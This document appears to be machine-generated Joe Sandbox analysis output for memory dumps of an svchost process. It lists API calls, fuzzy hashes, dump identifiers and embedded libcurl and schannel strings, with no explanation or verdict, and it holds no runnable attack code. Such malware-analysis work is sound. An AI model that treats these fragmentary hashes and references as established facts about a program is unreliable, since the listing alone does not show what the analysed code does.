                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 72d2dbb8c05805521502d31913c7e2dcfda900fa91af8ab57f2baabed37d7821
                                                                • Instruction ID: 25752253c70731ffcba9fb4cc49b3624c368427b958c1748a6ce3dab28b7a23b
                                                                • Opcode Fuzzy Hash: 72d2dbb8c05805521502d31913c7e2dcfda900fa91af8ab57f2baabed37d7821
                                                                • Instruction Fuzzy Hash: E831E43630C64095EA68ABA6D5C03EDA6B0F749FC4F880025EF6E07785FF69C651A350
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000003.1588552176.00000173D0380000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000173D0380000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_3_173d0380000_svchost.jbxd
                                                                Similarity
                                                                • API ID: LibraryLoad
                                                                • String ID:
                                                                • API String ID: 1029625771-0
                                                                • Opcode ID: c8def6fedd9c5836e92fabc2dd1894f4ed18aaca8c094442d268cbce729e04a9
                                                                • Instruction ID: ba700a2fca9e2e4f90a47902013e61597943d77929cb7caf7ffffa12b04031df
                                                                • Opcode Fuzzy Hash: c8def6fedd9c5836e92fabc2dd1894f4ed18aaca8c094442d268cbce729e04a9
                                                                • Instruction Fuzzy Hash: 97911072B0525187EB648FA5D280BADB3B1FB40FD4F8481609F6E07784DB79EA52E700
                                                                APIs
                                                                  • Part of subcall function 00000173D03B1724: GetProcessHeap.KERNEL32 ref: 00000173D03B172F
                                                                  • Part of subcall function 00000173D03B1724: HeapAlloc.KERNEL32 ref: 00000173D03B173E
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B17AE
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B17DB
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B17F5
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B1815
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B1830
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B1850
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B186B
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B188B
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B18A6
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B18C6
                                                                • SleepEx.KERNELBASE ref: 00000173D03B1BDB
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B18E1
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B1901
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B191C
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B193C
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B1957
                                                                  • Part of subcall function 00000173D03B1724: RegOpenKeyExW.ADVAPI32 ref: 00000173D03B1977
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B1992
                                                                  • Part of subcall function 00000173D03B1724: RegCloseKey.ADVAPI32 ref: 00000173D03B199C
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID: CloseOpen$Heap$AllocProcessSleep
                                                                • String ID:
                                                                • API String ID: 948135145-0
                                                                • Opcode ID: c734f778ebace249d11891a89cc237880a62daafbc4a5d84d80dcf23aa596c60
                                                                • Instruction ID: 50c5c79aded8a30942cffc8ac8b74a1e4900b60efe01ecfe701284cbe0691cc6
                                                                • Opcode Fuzzy Hash: c734f778ebace249d11891a89cc237880a62daafbc4a5d84d80dcf23aa596c60
                                                                • Instruction Fuzzy Hash: E431717130860441FB739FA2D7403EDD3B0AB84FC8FD454218E2D8769ADFA2CA50A350
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: socket
                                                                • String ID:
                                                                • API String ID: 98920635-0
                                                                • Opcode ID: 4b996f48484ad4d943085cdf321c2f5f56c4e47a803c815960622bae58fff54d
                                                                • Instruction ID: 85ac370fe7c2642e42f65863f53e112ce28b7edd5ffc546a91c360c329e0cb29
                                                                • Opcode Fuzzy Hash: 4b996f48484ad4d943085cdf321c2f5f56c4e47a803c815960622bae58fff54d
                                                                • Instruction Fuzzy Hash: 80118236708A80C2D7648FA6E184399B7B1F748FE4F888620DBAD57B94DF38D591D700
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: closesocket
                                                                • String ID:
                                                                • API String ID: 2781271927-0
                                                                • Opcode ID: f5e5c931f568ed04444b0b36d0a8910c15cb7555877ea71fb8bd6f2f63156bad
                                                                • Instruction ID: ac9e1fe8e9a7d0147c3bdf9fe5a847a79d73fdba19f5f9fbb7c86d4e4c2e860f
                                                                • Opcode Fuzzy Hash: f5e5c931f568ed04444b0b36d0a8910c15cb7555877ea71fb8bd6f2f63156bad
                                                                • Instruction Fuzzy Hash: FB01963571865041EA649796E48839A9270F748FE4F8C5320AE3E5BBD9EF28C5915700
                                                                APIs
                                                                • ___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00000173CFC2E319
                                                                  • Part of subcall function 00000173CFC03080: GetLocaleInfoEx.KERNELBASE ref: 00000173CFC030A3
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2555978653.00000173CFC01000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173CFC00000, based on PE: true
                                                                • Associated: 00000010.00000002.2555926187.00000173CFC00000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556090829.00000173CFC55000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556158270.00000173CFC86000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8A000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2556223268.00000173CFC8F000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173cfc00000_svchost.jbxd
                                                                Similarity
                                                                • API ID: InfoLocale___lc_locale_name_func
                                                                • String ID:
                                                                • API String ID: 3366915261-0
                                                                • Opcode ID: f321fbd6428a595b6038f718f98f2583b86d447d5f6d195c715a18383540869d
                                                                • Instruction ID: 99140b91e00974be83252a423111522e3f1ce97f17df162e65bef14edb4307fe
                                                                • Opcode Fuzzy Hash: f321fbd6428a595b6038f718f98f2583b86d447d5f6d195c715a18383540869d
                                                                • Instruction Fuzzy Hash: 1AF08C3372D042C2E36A5A28C0947F912B0F384702F458907E1DE722A0C618D744E601
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: _beginthreadex
                                                                • String ID:
                                                                • API String ID: 3014514943-0
                                                                • Opcode ID: 12d530c60010292d5cdc75557250193eb43d1c307b29f796c6545e99bf5471df
                                                                • Instruction ID: 13591cc2fc31543e8262d2419cf3aeb6f509bcf6ee9655bb366dee95d8c6d63c
                                                                • Opcode Fuzzy Hash: 12d530c60010292d5cdc75557250193eb43d1c307b29f796c6545e99bf5471df
                                                                • Instruction Fuzzy Hash: D3E0C266B1974083EF345FB2AC41256E3916B4CBB1F8C473C5D7C467E0E73C92918810
                                                                APIs
                                                                • HeapAlloc.KERNEL32(?,?,00000000,00000173D03BCBA2,?,?,?,00000173D03BD255,?,?,?,?,00000173D03BD318), ref: 00000173D03BD2C1
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2560283707.00000173D03B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00000173D03B0000, based on PE: true
                                                                • Associated: 00000010.00000002.2559994947.00000173D03B0000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2560836688.00000173D03C6000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561560882.00000173D03D1000.00000004.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2561932402.00000173D03D3000.00000002.00001000.00020000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2562469981.00000173D03D9000.00000002.00001000.00020000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d03b0000_svchost.jbxd
                                                                Similarity
                                                                • API ID: AllocHeap
                                                                • String ID:
                                                                • API String ID: 4292702814-0
                                                                • Opcode ID: 74fd91d67496214158fd315a04cded00c411d46558866947622f89becc2b6a32
                                                                • Instruction ID: b905cbf759bbb08869538362d06dad7acf8dab3dcc31abde94d38fbdd58cea87
                                                                • Opcode Fuzzy Hash: 74fd91d67496214158fd315a04cded00c411d46558866947622f89becc2b6a32
                                                                • Instruction Fuzzy Hash: 32F04934B0928041FF7656E2DA543D5D2B05B89FC8F8C18341D2E8A7C6FBBECA916210
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memset
                                                                • String ID:
                                                                • API String ID: 2221118986-0
                                                                Similarity
                                                                • API ID: free$_strdup$strpbrk$calloc
                                                                • String ID: AUTH=$ SIZE=$ SMTPUTF8$%lld$<%s>$<%s@%s>$MAIL$MAIL FROM:%s%s%s%s%s%s$Mime-Version$Mime-Version: 1.0$state change from %s to %s
                                                                • API String ID: 2687331901-2592802878
                                                                Similarity
                                                                • API ID: free$_strdup_vfwprintf_lmallocstrncmp
                                                                • String ID: -----END PUBLIC KEY-----$ public key hash: sha256//%s$-----BEGIN PUBLIC KEY-----$;sha256//$Z$Z$sha256//
                                                                • API String ID: 141866899-1456817947
                                                                APIs
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A754D
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7562
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7582
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A75B0
                                                                • _strdup.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A75D3
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7656
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7661
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A766C
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7742
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A776F
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7795
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A7810
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 00000173D01A783B
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A78E4
                                                                  • Part of subcall function 00000173D0171BF0: realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0171C18
                                                                  • Part of subcall function 00000173D0171BF0: GetEnvironmentVariableA.KERNEL32 ref: 00000173D0171C3E
                                                                  • Part of subcall function 00000173D0171BF0: realloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0171C5F
                                                                  • Part of subcall function 00000173D0171BF0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0171C70
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A7923
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A792C
                                                                Similarity
                                                                • API ID: free$_strdup$realloc$EnvironmentVariable
                                                                • String ID: %s_proxy$ALL_PROXY$NO_PROXY$Uses proxy env variable %s == '%s'$all_proxy$http_proxy$memory shortage$no_proxy
                                                                • API String ID: 2726205129-4066991793
                                                                Similarity
                                                                • API ID: htons$ErrorLast$bindinet_pton$memsetstrchrstrtoul
                                                                • String ID: Bind to local port %d failed, trying next$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s
                                                                • API String ID: 878540305-2129795902
                                                                APIs
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A8737
                                                                • strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00000173D01A8D40
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A9124
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A913A
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A914E
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A9162
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A9176
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A918A
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A919E
                                                                  • Part of subcall function 00000173D01A9110: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A91B2
                                                                  • Part of subcall function 00000173D01A9E10: calloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A9E27
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9E41
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9E5C
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9E78
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9E94
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9EB0
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9EC8
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9EE0
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9EF8
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9F10
                                                                  • Part of subcall function 00000173D01A9E10: _strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00000173D01A9F28
                                                                  • Part of subcall function 00000173D01A9E10: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D01A9F42
                                                                Similarity
                                                                • API ID: _strdupfree$callocstrtoul
                                                                • String ID: (in redirect)$%s://%s$Protocol "%s" %s%s$Switched from HTTP to HTTPS due to HSTS => %s$Too long hostname (maximum is %d)$URL rejected: %s$disabled$file$http$https$not supported
                                                                • API String ID: 3044576692-2601942094
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireCreateHashRelease
                                                                • String ID: $@
                                                                • API String ID: 4045725610-1077428164
                                                                Similarity
                                                                • API ID: Crypt$Hash$Context$ParamRelease$AcquireCreateDataDestroy
                                                                • String ID: @
                                                                • API String ID: 1945989244-2766056989
                                                                Similarity
                                                                • API ID: _errno$strtol
                                                                • String ID: GMT
                                                                • API String ID: 3596500743-2739267314
                                                                Similarity
                                                                • API ID: Crypt$Hash$Param$ContextDestroyRelease
                                                                • String ID:
                                                                • API String ID: 2110207923-3916222277
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: Resolving timed out after %lld milliseconds$operation aborted by pre-request callback
                                                                • API String ID: 1294909896-247252918
                                                                • Opcode ID: 9b71fe19b17558c535b4c30176accc14f1f9a49e4d510d29523e8f09ac2727bc
                                                                • Instruction ID: 94239b9964d66b86a107e7c33688e840eca03ab893adf4364b3895557b6da8aa
                                                                • Opcode Fuzzy Hash: 9b71fe19b17558c535b4c30176accc14f1f9a49e4d510d29523e8f09ac2727bc
                                                                • Instruction Fuzzy Hash: 3BD19E7920868092FB749EA5C4943E9A7B0F741FC8FC84521DA6E476D9FB78CB48E350
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireCreateHashRelease
                                                                • String ID: @
                                                                • API String ID: 4045725610-2766056989
                                                                • Opcode ID: 3888297001991cb91ed5e33a0340ce1c6b4659861168bb3409d085dce8243c24
                                                                • Instruction ID: f8228d868209ad30440d2add5e8b061b05c7c787cb00f0fd52b906ae3cc296a6
                                                                • Opcode Fuzzy Hash: 3888297001991cb91ed5e33a0340ce1c6b4659861168bb3409d085dce8243c24
                                                                • Instruction Fuzzy Hash: 8BF062BAB1461483F7605B71E8417A7A3B0AB94F85F888010DE6C87A54FF3CC2959B04
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Crypt$Context$AcquireCreateHashRelease
                                                                • String ID: @
                                                                • API String ID: 4045725610-2766056989
                                                                • Opcode ID: 8f927874fc51e87bfacafe930be793d4c248da460ac4387e593e5e0d7d5bafbf
                                                                • Instruction ID: c0c3007c4852e237e85896ef927b3f62184a317bdeb2718844ad9d28bc2a5e4d
                                                                • Opcode Fuzzy Hash: 8f927874fc51e87bfacafe930be793d4c248da460ac4387e593e5e0d7d5bafbf
                                                                • Instruction Fuzzy Hash: 47F0627AB1461583F7215B71E8417A7A3B1F795B88F844010DE6C47A54EB7CC2959B04
                                                                APIs
                                                                Strings
                                                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN, xrefs: 00000173D01B278F
                                                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED, xrefs: 00000173D01B2777
                                                                • P, xrefs: 00000173D01B266A
                                                                • schannel: Failed to read remote certificate context: %s, xrefs: 00000173D01B2814
                                                                • schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN, xrefs: 00000173D01B27CE
                                                                • schannel: failed to create certificate chain engine: %s, xrefs: 00000173D01B269A
                                                                • (memory blob), xrefs: 00000173D01B25F2
                                                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT, xrefs: 00000173D01B27A6
                                                                • schannel: CertGetCertificateChain error mask: 0x%08lx, xrefs: 00000173D01B27DC
                                                                • schannel: CertGetCertificateChain failed: %s, xrefs: 00000173D01B272D
                                                                • schannel: failed to create certificate store: %s, xrefs: 00000173D01B25C6
                                                                • schannel: this version of Windows is too old to support certificate verification via CA bundle file., xrefs: 00000173D01B2545
                                                                • schannel: reusing certificate store from cache, xrefs: 00000173D01B2571
                                                                • schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID, xrefs: 00000173D01B27BA
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: Cert$Certificate$ChainErrorLast$Free$EngineStore$CloseContextCreateOpen_errnomemcmp
                                                                • String ID: (memory blob)$P$schannel: CertGetCertificateChain error mask: 0x%08lx$schannel: CertGetCertificateChain failed: %s$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_NOT_TIME_VALID$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_PARTIAL_CHAIN$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_REVOKED$schannel: CertGetCertificateChain trust error CERT_TRUST_IS_UNTRUSTED_ROOT$schannel: CertGetCertificateChain trust error CERT_TRUST_REVOCATION_STATUS_UNKNOWN$schannel: Failed to read remote certificate context: %s$schannel: failed to create certificate chain engine: %s$schannel: failed to create certificate store: %s$schannel: reusing certificate store from cache$schannel: this version of Windows is too old to support certificate verification via CA bundle file.
                                                                • API String ID: 2715537422-1548139997
                                                                • Opcode ID: d399bcd0cc52d605d7e31dceeb1133debc0e206549a3df09dba65a9132665656
                                                                • Instruction ID: 1300279df47f6ec514f1811e4d1a2b60ea210d163443f2af8bbd63944e3d85ed
                                                                • Opcode Fuzzy Hash: d399bcd0cc52d605d7e31dceeb1133debc0e206549a3df09dba65a9132665656
                                                                • Instruction Fuzzy Hash: DFB16E7921875085EA329BE5E8503EEE3B1B746FC0F804016EE7E47B95EF68C645A740
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000010.00000002.2558784917.00000173D0151000.00000020.10000000.00040000.00000000.sdmp, Offset: 00000173D0150000, based on PE: true
                                                                • Associated: 00000010.00000002.2558660792.00000173D0150000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559024295.00000173D01BB000.00000002.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559157310.00000173D01D7000.00000004.10000000.00040000.00000000.sdmp
                                                                • Associated: 00000010.00000002.2559890217.00000173D01DB000.00000002.10000000.00040000.00000000.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_16_2_173d0150000_svchost.jbxd
                                                                Similarity
                                                                • API ID: memmove
                                                                • String ID: schannel: SSL/TLS connection renegotiated$schannel: an unrecoverable error occurred in a prior call$schannel: cannot renegotiate, an error is pending$schannel: enough decrypted data is already available$schannel: failed to decrypt data, need more data$schannel: failed to read data from server: %s$schannel: recv returned CURLE_RECV_ERROR$schannel: recv returned error %d$schannel: remote party requests renegotiation$schannel: renegotiating SSL/TLS connection$schannel: renegotiation failed$schannel: server close notification received (close_notify)$schannel: server closed abruptly (missing close_notify)$schannel: server indicated shutdown in a prior call$schannel: unable to re-allocate memory
                                                                • API String ID: 2162964266-1798541782
                                                                • Opcode ID: 9e8613e48d921a49cedfa7356a96f8517f371c7eaffba6172c96dda00a0db7ad
                                                                • Instruction ID: 399fc137b6a116c5573936ede1e15b2897f74aa8e851e6c918488589e0d9cc9f
                                                                • Opcode Fuzzy Hash: 9e8613e48d921a49cedfa7356a96f8517f371c7eaffba6172c96dda00a0db7ad
                                                                • Instruction Fuzzy Hash: 7AE17C7A20875086EB70DFE6D4443D9B7B1F741FC8F804019EA6D67698EB78CA86E740
                                                                APIs
                                                                • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D01826DF
                                                                • free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00000173D0168569), ref: 00000173D0182723
                                                                  • Part of subcall function 00000173D0182510: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00000173D0182547
